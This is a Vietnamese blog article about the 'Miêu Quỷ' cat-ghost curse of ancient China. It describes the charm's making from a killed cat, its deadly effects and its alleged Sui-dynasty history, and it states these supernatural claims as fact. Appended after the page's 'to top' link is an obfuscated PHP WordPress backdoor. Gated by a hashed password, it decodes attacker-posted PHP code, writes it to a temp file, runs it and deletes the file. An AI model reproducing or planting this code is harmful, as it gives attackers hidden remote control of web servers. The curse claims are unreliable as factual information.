Bùa Miêu Qủy – tà thuật đáng sợ thời Trung Hoa cổ đại

- Xem(618)

Không phải ai cũng biết bùa Miêu Qủy là gì khi ngày nay người ta thường dùng các loại bùa chú khác nhau, hãy cùng xosochuan.net tìm hiểu chi tiết về loại bùa này nhé.

Bùa miêu quỷ là gì

Bùa Miêu Qủy - tà thuật đáng sợ thời Trung Hoa cổ đại

Bùa Miêu Qủy khá đáng sợ nhưng rất ít người biết tới loại bùa này. Vậy bùa Miêu Quỷ là gì? Đấy là loại bùa mà các phù thủy cổ đại làm từ xác một con mèo già được lựa chọn. Người ta nuôi và giết nhằm mục đích yểm những thứ tà thuật lên đó để giúp những linh hồn ác quỷ có thể trú ngụ lên cơ thể những con mèo đấy. Từ đấy có thể sử dụng những con mèo này như một loại bùa ngải để đi hại người.

Có thể nói đây là một loại bùa chú vô cùng đáng sợ, khi một ai đấy bị yểm Miêu Quỷ, ban đầu tứ chi sẽ đau nhức rồi từ từ lan tới cơ thể và cuối cùng trái tim sẽ đau đớn quằn quại như đang bị ngàn kim châm chích vào. Khi này thì Miêu Quỷ đang nuốt chửng các cơ quan nội tạng của họ và sẽ nôn ra máu và nhanh chóng chết sớm.

Ngoài ra, bên cạnh nỗi đau thể xác thì người bị yểm cũng phải chịu đựng những đả kích về tinh thần rất lớn, Họ sẽ bị ám ảnh rằn vặt những nỗi sợ vô hình..

Nguồn gốc và mục đích sử dụng bùa miêu qủy

Nguồn gốc:

Bùa Miêu Qủy được sử dụng rộng rãi vào thời đại phong kiến Trung Quốc nhất là ở thời nhà Tuỳ, theo đó Độc Cô Hoàng Hậu đã từng sử dụng qua loại bùa ngải này.

Sau đấy có nhiều vấn đề nảy sinh nên triều đình nhà Tuỳ đã ban bố lệnh nghiêm cấm xử dụng thứ tà thuật vô nhân tính này. Những ai còn bàn tán, truyền bá hay sử dung Miêu Quỷ nếu phát hiện đều sẽ bị đưa đi lưu đày ở biên cương. Bởi thế mà ngày nay rất ít người biết tới tà thuật này

Mục đích sử dụng của bùa miêu quỷ

Bùa này thường được những người thù hằn nhau dùng để trả thù, nguyền rủa đối thủ cho đến chết.

Còn mục đích chính của loại bùa này là khả năng cầu tiền tài, danh vọng và phú quý cho người yểm thứ bùa này.

Nhưng để cầu được tiền tài và phú quý thì cũng phải đánh đổi bằng mạng sống của một người nào khác có tiền tài như người yểm mong muốn. Nếu thuật yểm thành công thì tiền tài, địa vị và danh vọng của người bị yểm sẽ được chuyển hết sang cho người yểm theo một cách huyền bí nào đấy.

Trên đây là những chia sẻ của tâm linh về bùa miêu quỷ là gì, hy vọng rằng với những chia sẻ trên đây thì bạn đọc đã nắm được những thông tin bổ ích rồi nhé.

to top if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}